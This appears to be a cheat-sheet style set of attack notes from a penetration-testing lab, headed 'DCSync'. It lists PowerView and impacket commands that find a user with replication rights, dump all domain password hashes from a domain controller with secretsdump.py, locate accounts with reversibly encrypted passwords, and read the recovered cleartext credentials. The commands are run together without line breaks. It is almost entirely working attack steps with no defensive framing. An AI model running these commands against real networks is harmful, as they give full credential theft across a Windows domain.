DCSync
Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof,useraccountcontrol |fl$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | flsecretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 ls inlanefreight_hashes*Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControlGet-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrolcat inlanefreight_hashes.ntds.cleartext runas /netonly /user:INLANEFREIGHT\adunn powershellLast updated